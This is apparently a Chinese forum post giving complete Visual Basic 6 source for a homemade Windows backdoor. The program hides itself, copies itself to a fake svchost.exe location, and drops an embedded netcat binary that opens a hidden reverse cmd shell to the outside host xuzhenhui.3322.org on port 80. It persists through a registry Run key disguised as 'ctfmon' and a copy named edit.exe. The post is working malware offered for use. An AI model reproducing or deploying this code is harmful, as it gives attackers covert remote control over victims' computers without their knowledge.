nc打造自己的删除此帖

pig444

以下是form1中的代码：
Dim ms() As Byte
Dim share As String
Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
If App.PrevInstance Then
End
End If
share = "C:\Program Files\Common Files\Microsoft Shared\MSInfo\svchost.exe"
If App.Path & "\" & App.EXEName & ".exe" <> share Then'我把启动文件和运行文件分离了
   if dir(share)="" then
         FileCopy App.Path & "\" & App.EXEName & ".exe", share
    end if
      Shell share, vbHide
    End
End If
End Sub
Private Sub Timer1_Timer() '监控NC
If Dir("c:\windows\ms.exe") = "" Then
   ms = LoadResData(101, "custom")'释放nc
    Open "c:\windows\ms.exe" For Binary As #1
     Put #1, 1, ms()'把NC写到系统目录
   Close #1
End If
If CheckApplicationIsRun("ms.exe") = False Then
    Shell "c:\windows\ms.exe -d  -e cmd xuzhenhui.3322.org 80", vbHide'NC反向连接
End If
  
End Sub
Function CheckApplicationIsRun(ByVal szExeFileName As String) As Boolean '判断NC是否在运行的函数其实不用亦无防
          On Error GoTo Err
          Dim WMI
          Dim Obj
          Dim Objs
          CheckApplicationIsRun = False
          Set WMI = GetObject("WinMgmts:")
          Set Objs = WMI.InstancesOf("Win32_Process")
          For Each Obj In Objs'遍历进程
                  If InStr(UCase(szExeFileName), UCase(Obj.Description)) <> 0 Then
                        CheckApplicationIsRun = True
                        If Not Objs Is Nothing Then Set Objs = Nothing
                        If Not WMI Is Nothing Then Set WMI = Nothing
                        Exit Function
                  End If
          Next
          If Not Objs Is Nothing Then Set Objs = Nothing
          If Not WMI Is Nothing Then Set WMI = Nothing
          Exit Function
Err:
          If Not Objs Is Nothing Then Set Objs = Nothing
          If Not WMI Is Nothing Then Set WMI = Nothing
  End Function
Private Sub Timer2_Timer()'监控注册表RUN项和启动文件
Dim sys As String
sys = "c:\windows\system32\edit.exe"
RegEdit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "ctfmon", sys
If Dir(sys) = "" Then
     FileCopy App.Path & "\" & App.EXEName & ".exe", sys
End If
End Sub
以下是module1的代码：

Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const GW_OWNER = 4
Public Const SW_HIDE = 0
Public Const WM_CLOSE = &H10

Public Sub RegEdit(strPath As String, strKey As String, strValue As String)'一个修改注册表的子过程   
Dim l As Long
Dim s As String
Dim s1 As String
Dim n As Long
Dim keyhand As Long
s = String(255, Chr(0))
s1 = String(255, Chr(0))
n = 255
l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)

If l = 0 Then '是否打开
   
    l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)
  
  If l <> 0 Then '是否也有
   
    l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue))  '修改注册表
         
  End If

End If

l = RegCloseKey(keyhand)'关闭

End Sub